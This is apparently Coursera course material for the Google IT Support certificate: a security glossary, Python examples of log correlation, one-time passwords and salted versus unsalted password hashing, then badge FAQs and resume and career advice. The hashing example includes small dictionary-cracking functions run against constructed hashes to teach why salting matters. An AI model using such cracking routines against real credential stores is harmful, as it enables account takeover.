Keylogger: A common type of spyware that's used to record every keystroke you make

L2TP (Layer 2 Tunneling Protocol): It is typically used to support VPNs

Lightweight Directory Access Protocol (LDAP): An open industry-standard protocol for
accessing and maintaining directory services; the lightweight alternative to the X.500 DAP

Logic bomb: Malware that stays dormant until a specific condition is met, such as a date, a
time or an event (like an account being disabled), and then executes its payload. It is often
planted deliberately, for example by an insider

Logs analysis systems: They are configured using user-defined rules to match interesting or
atypical log entries

MACs (Message Authentication Codes): A bit of information that allows authentication of a
received message, ensuring that the message came from the alleged sender and not a third
party masquerading as them

Malware: A type of malicious software that can be used to obtain your sensitive information
or delete or modify files

MD5: A popular and widely used hash function designed in the early 1990s as a cryptographic
hashing function; it is now considered broken for collision resistance and shouldn't be used for
signatures or certificates

Meddler in the middle (formerly known as Man in the Middle): An attack that places the
attacker in the middle of two hosts that think they're communicating directly with each other

MIC (Message Integrity Check): It is essentially a hash digest of the message in question

Monitor mode: It allows to scan across channels to see all wireless traffic being sent by APs
and clients

Multifactor authentication (MFA): A system where users are authenticated by presenting
multiple pieces of information or objects

Network hardening: Is the process of securing a network by reducing its potential
vulnerabilities through configuration changes, and taking specific steps

Network separation (network segmentation): A good security principle for an IT support
specialist to implement. It permits more flexible management of the network and provides
some security benefits. This is the concept of using VLANs to create virtual networks for
different device classes or types

Network software hardening: Includes things like firewalls, proxies, and VPNs

Network time protocol (NTP): A network protocol used to synchronize clocks across systems;
among other things it keeps the time on an authenticator token and the authentication server
in step so that time-based one-time passwords line up

NIST: National Institute of Standards and Technology

Normalization: It's the process of taking log data in different formats and converting it into a
standardized format that's consistent with a defined log structure
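The analyzing logs, correlation analysis, logs analysis systems and normalization entries describe one pipeline; the code below is an added example (not from the course) that runs it end to end. Two constructed log formats (an OpenSSH-style auth log and an nginx-style access log; every entry is made up) are parsed into one common record shape, merged into a single timeline, and a user-defined rule flags a source address that failed to log in repeatedly and then succeeded.

```python
"""Added example: normalize two log formats into one record shape, then correlate across them.
All log lines are constructed; regexes cover only the line shapes used here. Standard library only."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

SSH_LOG = """\
2024-03-01T09:00:01 host1 sshd[5010]: Failed password for root from 198.51.100.7 port 40100 ssh2
2024-03-01T09:00:03 host1 sshd[5011]: Failed password for root from 198.51.100.7 port 40101 ssh2
2024-03-01T09:00:05 host1 sshd[5012]: Failed password for admin from 198.51.100.7 port 40102 ssh2
2024-03-01T09:00:09 host1 sshd[5013]: Accepted password for admin from 198.51.100.7 port 40103 ssh2
2024-03-01T09:05:00 host1 sshd[5020]: Accepted publickey for alice from 10.0.0.5 port 51234 ssh2
"""

WEB_LOG = """\
198.51.100.7 - - [01/Mar/2024:08:59:50 +0000] "GET /wp-login.php HTTP/1.1" 404 153
10.0.0.5 - - [01/Mar/2024:09:06:10 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

SSH_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) \w+ for (?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
WEB_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize_ssh(text: str) -> List[Dict]:
    """sshd lines -> {ts, source, ip, event, detail}; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = SSH_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "source": "sshd", "ip": m["ip"],
                           "event": "auth_success" if m["result"] == "Accepted" else "auth_failure",
                           "detail": m["user"]})
    return events


def normalize_web(text: str) -> List[Dict]:
    """nginx combined-style lines -> the same record shape (timestamps made naive UTC)."""
    events = []
    for line in text.splitlines():
        m = WEB_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            events.append({"ts": ts, "source": "nginx", "ip": m["ip"],
                           "event": f"http_{m['status']}", "detail": f"{m['method']} {m['path']}"})
    return events


def correlate(events: List[Dict], min_failures: int = 3,
              window: timedelta = timedelta(minutes=10)) -> List[str]:
    """Rule: an IP with >= min_failures auth failures followed by a success inside `window`."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_ip[ev["ip"]].append(ev)
    flagged = []
    for ip, evs in by_ip.items():
        failures = []
        for ev in evs:
            if ev["event"] == "auth_failure":
                failures.append(ev["ts"])
            elif ev["event"] == "auth_success":
                if sum(1 for t in failures if ev["ts"] - t <= window) >= min_failures:
                    flagged.append(ip)
                    break
    return flagged


def timeline(ip: str, events: List[Dict]) -> List[str]:
    """Every normalized event for one IP across all sources, oldest first: the analyst's view."""
    return [f"{e['ts'].isoformat()} {e['source']} {e['event']} {e['detail']}"
            for e in sorted(events, key=lambda e: e["ts"]) if e["ip"] == ip]


if __name__ == "__main__":
    all_events = normalize_ssh(SSH_LOG) + normalize_web(WEB_LOG)
    for ip in correlate(all_events):
        print("suspicious:", ip)
        for line in timeline(ip, all_events):
            print("  ", line)
```

The cross-system timeline is what normalization buys you: the web server's 404 on `/wp-login.php` from the same address, ten seconds before the SSH guessing started, is invisible while the two logs live in different formats.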

OAuth: An open standard that allows users to grant third-party websites and applications
access to their information without sharing account credentials

Counter mode (CTR): A mode of operation that turns a block cipher into a stream cipher by
encrypting a random seed value (nonce) combined with an incrementing counter to create a
key stream, which is then XORed with the data

One-time password (OTP) tokens: Another very common method for handling multifactor

One-time password (OTP): A short-lived token, typically a number that's entered along with
a username and password
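The MACs, HMAC, counter-based tokens and one-time password entries describe one construction built on another: HOTP is just HMAC-SHA1 over a counter with a truncation step, and TOTP is HOTP with the counter replaced by the number of 30-second steps since the epoch. The block below is an added example (not from the course) implementing both from the standard library; the secret is the RFC 4226/6238 test secret, not a real one.

```python
"""Added example: HMAC-based one-time passwords. hotp() follows RFC 4226, totp() RFC 6238.
TEST_SECRET is the RFC test vector secret (ASCII "12345678901234567890"). Standard library only."""
import hashlib
import hmac
import struct
import time
from typing import Optional

TEST_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, mod 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                   # low nibble selects a 4-byte window
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, digits: int = 6, step: int = 30) -> str:
    """Same algorithm; the counter is the number of time steps elapsed, which is why the token
    and the authentication server need synchronized clocks (see NTP)."""
    return hotp(secret, unix_time // step, digits)


def verify_hotp(secret: bytes, submitted: str, counter: int, look_ahead: int = 3) -> Optional[int]:
    """Server side: accept the code for the stored counter or a few ahead (the user may have
    generated codes without using them). Returns the new counter to store, or None if rejected.
    compare_digest avoids leaking how many leading digits matched through timing."""
    for c in range(counter, counter + look_ahead + 1):
        if hmac.compare_digest(hotp(secret, c), submitted):
            return c + 1          # never accept the same counter twice
    return None


if __name__ == "__main__":
    for c in range(3):
        print(f"HOTP counter {c}: {hotp(TEST_SECRET, c)}")
    print("TOTP at T=59, 8 digits:", totp(TEST_SECRET, 59, digits=8))
    print("TOTP now:", totp(TEST_SECRET, int(time.time())))
```

The truncation step is why a six-digit code is still safe to show on a screen: the attacker sees 20 bits of a 160-bit MAC, and the server rejects the counter after one use, so the only remaining attack is online guessing, which rate limiting handles.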

OpenID: An open standard that allows participating sites known as Relying Parties to allow
authentication of users utilizing a third party authentication service

Organizational units (OUs): Folders that let us group related objects into units like people or
groups to distinguish between individual user accounts and groups that accounts can belong
to

Packet sniffing (packet capture): the process of intercepting network packets in their
entirety for analysis

Pairwise Transient Key (PTK): It is generated using the PMK, AP nonce, Client nonce, AP
MAC address, and Client MAC address

Password attacks: Utilize software like password crackers that try and guess your password

Password salt: Additional randomized data that's added into the hashing function to
generate the hash that's unique to the password and salt combination

PBKDF2 (Password Based Key Derivation Function 2): A function that turns a password and a
salt into a key by applying a keyed hash (HMAC) many thousands of times, deliberately slowing
down brute force and dictionary attacks against stolen hashes

PGP (Pretty Good Privacy) encryption: An encryption application that allows authentication
of data along with privacy from third parties, relying upon asymmetric encryption to achieve
this

Phishing attack: It usually occurs when a malicious email is sent to a victim disguised as
something legitimate

Physical tokens: They take a few different forms, such as a USB device with a secret token on
it, a standalone device which generates a token, or even a simple key used with a traditional
lock

PIN authentication method (WPS): It uses PINs that are eight digits long, but the last digit is a
checksum that's computed from the first seven digits, so only seven digits are actually secret

Ping flood: It sends tons of ping packets to a system. If a computer can't keep up with this,
then it's prone to being overwhelmed and taken down

PKI system: A system that defines the creation, storage and distribution of digital certificates

Platform key: It's the public key corresponding to the private key used to sign the boot files

Port mirroring: Allows the switch to take all packets from a specified port, port range, or the
entire VLAN and mirror the packets to a specified switch port

Post-fail analysis: Investigating how a compromise happened after the breach is detected

Pre-shared key: It's the Wi-Fi password you share with people when they come over and
want to use your wireless network

Promiscuous mode: A type of computer networking operational mode in which all network
data packets can be accessed and viewed by all network adapters operating in this mode

Proxy: Can be useful to protect client devices and their traffic. They also provide secure
remote access without using a VPN

Pseudo-random: Something that isn't truly random

Public key authentication: A key pair is generated by the user who wants to authenticate

Public key signatures: Digital signature generated by composing the message and combining
it with the private key

RA (Registration Authority): It is responsible for verifying the identities of any entities
requesting certificates to be signed and stored with the CA

Rainbow table attacks: To trade computational power for disk space by pre-computing the
hashes and storing them in a table

Rainbow tables: A pre-computed table of candidate passwords and their corresponding
hashes, so that a stolen hash can be cracked by lookup instead of by hashing each guess
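Why the password salt, PBKDF2, rainbow table and dictionary attack entries belong together, as an added example that is not part of the course: a tiny precomputed table of unsalted SHA-256 digests cracks a leaked unsalted hash with one lookup, while the same wordlist gets no shortcut against a salted PBKDF2 hash and has to pay the full work factor per guess. The wordlist and passwords are constructed for the example.

```python
"""Added example: precomputed-table lookup against unsalted hashes versus salted PBKDF2.
WORDLIST is a constructed mini dictionary; real tables hold millions of entries. Standard library only."""
import hashlib
import hmac
import os
from typing import Dict, Optional

WORDLIST = ["password", "monkey", "football", "letmein", "qwerty", "correct horse"]
PBKDF2_ITERATIONS = 100_000   # work factor; raise it as hardware gets faster


def build_table(words) -> Dict[str, str]:
    """Precompute digest -> password once; because hashing is deterministic, any unsalted
    SHA-256 password hash seen later is just a dictionary lookup."""
    return {hashlib.sha256(w.encode()).hexdigest(): w for w in words}


def unsalted_hash(password: str) -> str:
    """What a weak system stores: the same password always yields the same digest."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Store 'pbkdf2_sha256$iterations$salt_hex$digest_hex' with a fresh random salt per user."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def crack_unsalted(stored_digest: str, table: Dict[str, str]) -> Optional[str]:
    """Rainbow-table style attack: one lookup, no hashing at all."""
    return table.get(stored_digest)


def crack_salted(stored: str, words) -> Optional[str]:
    """Dictionary attack against a salted hash: every guess must be re-derived with this
    record's salt and iteration count, and nothing computed here transfers to another user."""
    for w in words:
        if verify_password(w, stored):
            return w
    return None


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print("unsalted lookup:", crack_unsalted(unsalted_hash("monkey"), table))
    stored = hash_password("monkey")
    print("salted digest in table?", crack_unsalted(stored.split("$")[-1], table))
    print("salted dictionary attack:", crack_salted(stored, WORDLIST), "(100k iterations per guess)")
```

The salt does not make a weak password strong: `crack_salted` still finds "monkey". What it removes is the attacker's ability to do the work once and reuse it against every account in every breach.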

Random numbers: A very important concept in encryption because it avoids some kind of
pattern that an adversary can discover through close observation and analysis of encrypted
messages over time

Ransomware: A type of attack that holds your data or system hostage until you pay some
sort of ransom

RC4 (Rivest Cipher 4): A symmetric stream cipher that gained widespread adoption because
of its simplicity and speed; its key stream has known biases and it is now prohibited in TLS

Remote attestation: The idea of a system authenticating its software and hardware
configuration to a remote system

Remote Authentication Dial-in User Service (RADIUS): A protocol that provides AAA
services for users on a network

Reverse proxy: A service that might appear to be a single server to external clients, but
actually represents many servers living behind it

Risk mitigation: Understanding the risks your systems face, take measures to reduce those
risks, and monitor them

Risk: The possibility of suffering a loss in the event of an attack on the system

Rogue Access Point (AP) Attack: An access point that is installed on the network without the
network administrator's knowledge

Rogue DHCP server attack: An attacker can hand out DHCP leases with whatever
information they want by deploying a rogue DHCP server on your network, setting a gateway
address or DNS server, that's actually a machine within their control

Root certificate authority: They are self signed because they are the start of the chain of
trust, so there's no higher authority that can sign on their behalf

Rootkit: A collection of software or tools that gives an attacker privileged ("root" or
administrator) access to a system while hiding its own presence, for example by altering the
OS so that its files and processes don't show up

RSA: One of the first practical asymmetric cryptography systems to be developed, named for
the initials of the three co-inventors: Ron Rivest, Adi Shamir and Leonard Adleman

Screen lock: A security feature that helps prevent unwanted access by creating an action you
have to do to gain entry

Secure boot protocol: It uses public key cryptography to secure the encrypted elements of
the boot process

Secure channel: It is provided by IPsec, which provides confidentiality, integrity, and
authentication of data being passed

Secure element: It's a tamper resistant chip often embedded in the microprocessor or
integrated into the mainboard of a mobile device

Secure Shell (SSH): A secure network protocol that uses encryption to allow access to a
network service over unsecured networks

Security information and event management systems (SIEMs): A form of centralized logging
for security administration purposes

Security keys: Small embedded cryptoprocessors, that have secure storage of asymmetric
keys and additional slots to run embedded code

Security through obscurity: The belief that if no one knows what algorithm is being used or
what your general security practices are, then one is safe from attackers. It is a weak
assumption to build on; compare Kerckhoff's principle

Self-signed certificate: This certificate has been signed by the same entity that issued the
certificate

Serial number: A unique identifier for the certificate assigned by the CA, which allows the CA
to manage and identify individual certificates

Session hijacking (cookie hijacking): A common meddler in the middle attack

Session key: The shared symmetric encryption key used in TLS sessions to encrypt data being
sent back and forth

SHA1: It is part of the secure hash algorithm suite of functions, designed by the NSA and
published in 1995

Shannon's maxim: It states that the system should remain secure, even if your adversary
knows exactly what kind of encryption systems you're employing, as long as your keys remain
secure

Single Sign-on (SSO): An authentication concept that allows users to authenticate once to be
granted access to a lot of different services and applications

Social engineering: An attack method that relies heavily on interactions with humans instead
of computers

Software signing certificate: Trust mechanism where a software vendor can
cryptographically sign binaries they distribute using a private key

Spear phishing: Phishing that targets an individual or group - the fake emails may contain some
personal information like your name, or the names of friends or family

Spoofing: When a source is masquerading as something else

Spyware: The type of malware that's meant to spy on you

SQL Injection Attack: An attack that targets the entire website if the website is using a SQL
database

SSL 3.0: The latest revision of SSL that was deprecated in 2015

SSL/TLS Client Certificate: Certificates that are bound to clients and are used to
authenticate the client to the server, allowing access control to a SSL/TLS service

SSL/TLS Server Certificate: A certificate that a web server presents to a client as part of the
initial secure setup of an SSL, TLS connection

StartTLS: It permits a client to communicate using LDAP v3 over TLS

Steganography: The practice of hiding information from observers, but not encoding it

Stream ciphers: They take a stream of input and encrypt the stream one character or one digit
at a time, outputting one encrypted character or digit at a time

Subject Public Key Info: These two subfields define the algorithm of the public key along
with the public key itself

Subject: This field contains identifying information about the entity the certificate was issued
to

Substitution cipher: An encryption mechanism that replaces parts of your plaintext with
ciphertext

Symmetric key algorithm: Encryption algorithms that use the same key to encrypt and
decrypt messages

SYN flood: The server is bombarded with SYN packets

TACACS+: It is a device access AAA system that manages who has access to your network
devices and what they do on them

Tailgating: Gaining access into a restricted area or building by following a real employee in

Tcpdump: It's a super popular, lightweight command-line based utility that you can use to
capture and analyze packets

Threat: The possibility of danger that could exploit a vulnerability

Ticket granting service (TGS): It decrypts the Ticket Granting Ticket using the Ticket
Granting Service secret key, which provides the Ticket Granting Service with the client Ticket
Granting Service session key

Time-based token (TOTP): A One-Time-Password that's rotated periodically

TKIP (Temporal Key Integrity Protocol): Designed to address the shortcomings of WEP security

TLS 1.2 with AES GCM: A specific mode of operation for the AES block cipher that
essentially turns it into a stream cipher

TLS 1.2: The current recommended revision of SSL

TLS Handshake: A mechanism to initially establish a channel for an application to
communicate with a service

TPM (Trusted Platform Module): This is a hardware device that's typically integrated into
the hardware of a computer, that's a dedicated crypto processor

Transport mode: One of the two modes of operations supported by IPsec. When used, only
the payload of the IP packet is encrypted, leaving the IP headers untouched

Trojan: Malware that disguises itself as one thing but does something else

Trusted execution environment (TEE): It provides a full-blown isolated execution
environment that runs alongside the main OS

Tunnel mode: One of the two modes of operations supported by IPsec. When used, the entire
IP packet, header, payload, and all, is encrypted and encapsulated inside a new IP packet
with new headers

Tunnel: It is provided by L2TP, which permits the passing of unmodified packets from one
network to another

U2F (Universal 2nd Factor): It's a standard developed jointly by Google, Yubico and NXP
Semiconductors that incorporates a challenge-response mechanism, along with public key
cryptography to implement a more secure and more convenient second-factor
authentication solution

Unbind: It closes the connection to the LDAP server

Username and password authentication: Can be used in conjunction with certificate
authentication, providing additional layers of security

Validity: This field contains two subfields, Not Before and Not After, which define the dates
between which the certificate is valid

Version: What version of the X.509 standard the certificate adheres to

Viruses: The best known type of malware

VPN (Virtual Private Network): A secure method of connecting a device to a private
network over the internet

VPNs: Commonly used to provide secure remote access, and link two networks securely

Vulnerability: A flaw in the system that could be exploited to compromise the system

Web of trust: It is where individuals instead of certificate authorities sign other individuals'
public keys

WEP (Wired Equivalent Privacy): First security protocol introduced for Wi-Fi networks

Wireshark: It's another packet capture and analysis tool that you can use, but it's way more
powerful when it comes to application and packet analysis, compared to tcpdump

Worms: They are similar to viruses except that instead of having to attach themselves onto
something to spread, worms can live on their own and spread through channels like the
network

WPA (Wi-Fi Protected Access): Designed as a short-term replacement that would be
compatible with older WEP-enabled hardware with a simple firmware update

WPA2 Enterprise: It uses 802.1x authentication for Wi-Fi networks

WPS (Wifi Protected Setup): It's a convenience feature designed to make it easier for clients
to join a WPA-PSK protected network

802.1X with EAP-TLS: Offers arguably the best security available, assuming proper and
secure handling of the PKI aspects of it

802.1x: It is the IEEE standard for encapsulating EAP, or Extensible Authentication Protocol,
traffic over 802 networks

X.509 standard: It is what defines the format of digital certificates, as well as a certificate
revocation list or CRL

XTACACS: It stands for Extended TACACS, which was a Cisco proprietary extension on top
of TACACS

0-Day Vulnerability (Zero Day): A vulnerability that is not known to the software developer
or vendor, but is known to an attacker

Course 5 Glossary
To use the template for this course item, click the link below and select “Use Template.”

Link to glossary: Course 5 Glossary

OR

If you don’t have a Google account, you can download the template directly from the
attachment below.

C5 Glossary

DOCX File

Congratulations on all you've accomplished. 


What you have achieved is no small feat, 
it's very difficult to dive into a topic that you know nothing about. 
And from the very beginning to become the expert that you are now. 
>> You've done a lot of work, it's been an incredible journey. 
>> These are all not easy concepts to get but you made it through the whole thing. 
>> It's an amazing accomplishment and you should be really proud of yourself. 
>> Congrats, that's great work. 
>> Congratulations. 
>> Congratulations. 
>> Congratulations. 
>> Congratulations. 
>> Congratulations. 
>> You're probably exhausted right now but congratulations. 
And I hope that all this was super exciting and 
that you're really excited about where you can take this now. 
>> Congratulations, you've made it. 
You're through the program, now get out there and get a job and
get your career started.
Information and FAQs about badges
Congratulations on finishing the last course of the Google IT Support Professional Certificate! What an
accomplishment.

Learners who complete all five courses of this certificate are eligible to earn a digital badge from Credly
and Google.

Additionally, Google and CompTIA have teamed up to offer a co-skilled badge of completion. To get the
badge, learners must complete the Google IT Support Professional Certificate and pass the CompTIA A+
certification exams (1000 Series). With this dual badge, people who complete the Google IT Support
Professional Certificate and receive the CompTIA A+ certification are better set up to share their skills with
potential employers.

More details are in the FAQs below. For any other questions, including issues with your certificate, please
reach out to Coursera Learner Services.

About badges

What is a badge?

A badge is a visual representation of a credential you’ve earned - in this case, your credential is the Google
IT Support Professional Certificate! You’ll get a badge upon completion of the program; you can share it on
platforms like LinkedIn to catch the attention of potential employers.

What is Credly/Acclaim? 

Acclaim is a badging platform that’s part of Credly, a leading digital credential service provider. Acclaim
provides badges so that you can easily share your achievements to online destinations like LinkedIn, and
employers can instantly verify your skills.

How do I add my badges to my LinkedIn profile?

Follow the steps in this Acclaim article to add your badge to your LinkedIn. You can also check out this
YouTube video.

About the Google badge

How do I claim my badge for completing the Google IT Support Professional Certificate?

Upon completion of the certificate, you will receive an email letting you know you have earned a badge.
From the email, you can choose to claim the badge and opt in to share your information for the purposes of
badge issuing. If you decide to claim the badge, Coursera will then send a request to Acclaim to issue your
badge. If you don’t have an Acclaim account yet, you will be asked to create one before you can accept and
view your badge.

Please allow at least one week from your date of completion for the system to update. Make sure to check
your spam folder just in case it ends up there!
I completed the Google IT Support Professional Certificate program. What do I do if I have not received
an email invite to claim my badge?

If you’ve waited a week since you completed the certificate and haven’t received an email, please submit a
request through the Acclaim help center: https://support.youracclaim.com/hc/en-us.

When will I receive my badge?

Badges are sent out daily to learners who have completed all five courses of this Professional Certificate.
Please allow at least one week from your date of completion for the system to update.

About the Google and CompTIA dual badge

How do I know if I am eligible to get the Google/CompTIA dual badge?

If you complete all five courses of the Google certificate and pass the CompTIA A+ certification exams (1000
series), you’ll have access to a new dual badge from CompTIA and Google that you can also post on
LinkedIn to catch the attention of potential employers. Learn more here. 

What is the difference between the dual badge with CompTIA and the badge for the Professional
Certificate?

The dual badge shows that you completed both the Google IT Support Professional Certificate and passed
the CompTIA A+ certification exams (1000 series). The Professional Certificate badge only shows your
completion of the Google IT Support Professional Certificate. If you earn both badges, you’re basically a
rockstar and we encourage you to share them both on LinkedIn to show off your rockstar status.

I completed the Google IT Support Professional Certificate program and I passed the CompTIA A+
exams but did not receive an email from Acclaim to claim the dual badge. What do I do?

Please submit a request through the Acclaim help center for technical issues:
https://support.youracclaim.com/hc/en-us.

Will completing the Google certificate prepare me for the CompTIA A+ exams?

The Google IT Support Professional Certificate program aligns with the objectives covered by the newly
updated CompTIA A+ certification. Upon completion of the certificate program, you can download the
CompTIA A+ exam objectives to ensure that you’ve studied what you need to before taking the exams.

When will I receive my badge?

Dual badges are delivered within 2 weeks of completion of both the Google certificate and CompTIA exams.

Tailoring your Resume for IT Support


As you prepare for your job search, you will need to create or update your resume to reflect
your experience in order to apply for IT support roles. You have learned so much during this
course, and it is important that your resume reflects that. An effective resume highlights your
skills and experience and is tailored to the position you are applying for. Let’s explore how to
make your resume stand out by incorporating your new IT support skills and your previous
experience. 

Tailor the content


• Identify what is important to the potential employer. What does the employer want
to know about you? Make sure that you carefully read the job description and notice
which skills are mentioned. You can also read several job descriptions for the same
type of role to identify which skills and requirements show up frequently. For instance,
although specifics will vary by role and employer, many IT support-related roles
require the ability to effectively organize and coordinate across teams and projects,
manage multiple tasks simultaneously, and communicate effectively. You should take
note of these skills and be sure to highlight them using similar terms on your resume.
• Create one primary IT support resume to edit and tailor to each job application. You
should make sure that the order of your skills and qualifications matches the job
description. In doing this, you are making sure that the things that are most important
to the employer are at the top.
• Match the language used in the job description. Some employers use automation
software to filter resumes. If the job description uses keywords like procurement and
risk management, make sure your resume uses those keywords, too.
• Use IT support terminology. This will help the person reading your resume
understand how your past experience is relevant to an IT support role.
• Decide what not to include on your resume. You may have some skills that are
important to you, but those same skills may confuse or distract the hiring managers
reading your resume.
• Highlight how your experience and skills are relevant to IT support. If you have
been working in data entry but want to move into an IT support help desk role, your CRM
software skills will be essential in your new role. Make sure to point out how those
skills will be beneficial to the employer.

Choose an appropriate format


No matter what layout or template you choose for your resume, there are several things you
should keep in mind:

• The design of your resume should be simple and easy to understand for both human
and artificial intelligence readers. You don't want your resume to be discarded before
a real person has a chance to read it!
• Your resume should be easy to read and communicate all of the important
information in short bullet points.
• Your resume should be one to two pages long and contain only the last ten to fifteen
years of relevant experience. It is appropriate to use two columns on a one-page
resume, but if your resume is two pages, be sure to use the entire width of the page.

Update the relevant sections


Once you have determined the appropriate format for your resume, you will need to update
each of your resume’s major sections, which include:

• Contact information
• Professional summary
• Core competencies
• Professional experience
• Education and certifications

Pro tip: Resumes should be written in the third person and should not contain personal
pronouns.

Let’s discuss how to incorporate your new skills into these sections of your resume.

Contact information

Your header should contain your contact information and should go at the top of your
resume. 

• Your header should include the following information:
o Your name in a larger font than the rest of your resume
o The city and state you live in (you do not need to include your street address
for privacy purposes)
o Your phone number and a link to your email address
o Link to your LinkedIn profile URL
o Links to any other personal websites or portfolios, if applicable to the role you
are applying for
• Your header should be relevant, simple, and easy to read. Here is an example of a
resume header:

Professional summary

Below your header, include a professional summary.

• Use your summary to set the tone. Your summary should be one to three lines and
should clearly state why you are the best candidate for the position. It should
showcase the most important things you want the reader to know about you. If you
are applying for a new role, you will want to update your industry specialty. You likely
have experience that can be related to IT support, and you will want to incorporate
that relevant experience into your new professional summary. Make sure you tailor
your description of yourself to the role you are applying for.
• Merge the description of the role you are applying for with your experience. Here is
an example:
o IT support technician with two years of demonstrated success in network
installation. Skilled in cross-functional collaboration and project execution.
Articulate communicator who thrives in a results-driven collaborative
environment.
• Use keywords from the job description to describe yourself. If the job description
states that the company is looking for a candidate with knowledge of IT security, you
should add that to your resume; you have gained that knowledge with this
certification.

Once you have your professional introduction, your next sentence should describe how your
unique expertise will make you valuable to the employer. 

Pro tip: Don't forget to use this section to highlight something that makes you stand out from
other applicants. Use an accomplishment from a previous role to show the employer what
you can offer them. Take a look at this example of a professional summary section:

Now that you have your heading and professional summary updates, let’s move on to the
core competencies section of your resume.

Core competencies

Your core competencies should be a bulleted list of the most relevant skills applicable to the
position you are applying for. 

Pro tip: Scan the job description for core competencies you have gained during this
certification and your past experience, then use those skills as bullet points in this section.
Make sure to keep this section relatively short, with four to eight bullets. Here is an example
of an IT support resume core competencies section:

Now that you have showcased who you are and what makes you the best candidate for the
job, it is time to tell the story of what you have accomplished throughout your career in the
professional experience section.

Professional experience

The professional experience section of your resume provides a summary of the roles and
positions you have held in your career. List at least three positions in reverse chronological
order and only include what is most relevant to the position you are applying for. 

Your professional experience will not change much from previous resumes, because you can't
change the past roles you have held. However, you can possibly rewrite some of your bullets
to relate them to IT support. Make sure you are tying the industry lingo back to your previous
experience to show the reader (usually a hiring manager) how your skills relate to IT
support. Use terms like assessing compatibility, evaluating systems, testing, implementation,
software maintenance and customer support to show the reader that your past experience
translates to an IT support role.

Pro tip: Make sure your resume conveys how your past accomplishments are valuable to the
role you are applying for. Show the reader how you can make a difference in their
organization. An easy way to remember this is through the P.A.R.I.S. framework:

• Problem that needed to be solved
• Action(s) I took
• Result of action(s)
• Impact on project (users, quality, etc.)
• Supporting evidence (awards, bonus, etc.)

Below is an example of a professional experience section from an IT support resume:

Education and certifications

Now that the majority of your resume has been updated with your new skills and knowledge,
it is time to update your Education and Certifications section. In this  section of your resume,
you should include any degrees beyond your high school diploma in reverse chronological
order. For each degree, list the degree you earned, institution, location, and date of
graduation. This section should also list any professional certifications or credentials you
hold. It is here where you will list this new IT support certification. Here is an example of an
education and credentials section of an IT support resume:

Your resume is now updated and ready to use for IT support position applications! You have
revised your professional summary, added newly-acquired core competencies, related past
professional experience to IT support, and added this certification to your resume. 

Pro tip: It is always a good idea to have someone review your resume for any spelling or
grammatical errors. Recruiters and hiring managers often toss aside resumes that contain
typos. Once you are sure your resume is error-free, it is time to start your job search!

IT Support Resume Sample

Finding your Path and Perfect Role


As you begin your career, you’ll have to navigate your way to find the perfect role for you.
While there is no one way to find your ideal role, there are some things to consider to help you
better understand what direction you want to take. This reading will focus on a few of the
options to consider as you start to search for a job. 

Generalist vs specialist

Another category to consider when attempting to find your right path is whether you want to
work as a generalist or a specialist. A generalist is knowledgeable about many topics and has
various interests, while a specialist is an expert in a specific field. 

Generalists have broad, multifaceted roles that allow entry-level employees to gain
invaluable experience in many different areas related to the field. Alternatively, specialists are
focused on a singular aspect of IT. The table below provides an overview of common
generalist and specialist roles.

Common Generalist Roles

• IT Support Specialist
• IT Consultant
• Project Manager
• IT Manager
• Lead Technician

Common Specialist Roles

• Systems Administrator
• Network Administrator
• Field Service Technician
• IT Support Administrator

Please note that the word “specialist” is often used in job titles, even for roles that include
generalist-like tasks. When reviewing a job listing, be sure to read the duties and
responsibilities assigned to that role so that you have a clear understanding of what you will
be doing if hired. 

Choose your work environment

Choosing what type of environment works best for you is just as important as the type of role
you select. Different types of environments have their own cultures and practices. As an
entry-level employee, you’ll come across two types of workplaces: agency or in-house. You
can also choose to work for yourself in a freelance role. 

Agency vs In-house teams


In the IT field, agencies help other businesses perform a specific function related to
troubleshooting, maintenance, or administration. Agencies can support large or small
companies and often work independently from the business they’ve been hired for outside of
the determined needs. 

As an entry-level employee, you can expect to work for several clients. This is because
agencies often take on many different clients. It is common to work with a client for a short
time. While doing agency work, it’s unlikely that you will decide on the direction of
assignments since those are determined by the company that hired your agency’s services. 

Alternatively, companies who create and distribute a product or a service may build an
"in-house" team of internal employees to handle their IT needs. There are many reasons
companies choose this option, including reduced costs, full transparency between the team
and the larger company, and concern for the privacy of their users and their personal
information.

As an entry-level employee, you can expect to work on a team that is relatively smaller than
the rest of the company. Unlike working at an agency, many employees on an in-house team
have the opportunity to learn a great amount about the company they are performing IT
tasks for. 

Key takeaways

As you navigate your job search, think about what you want in a career. Establish the types of
roles you want early on and the type of company you want to work for. Over time, your
experience will help you make better-informed decisions related to your career direction.
Question 1

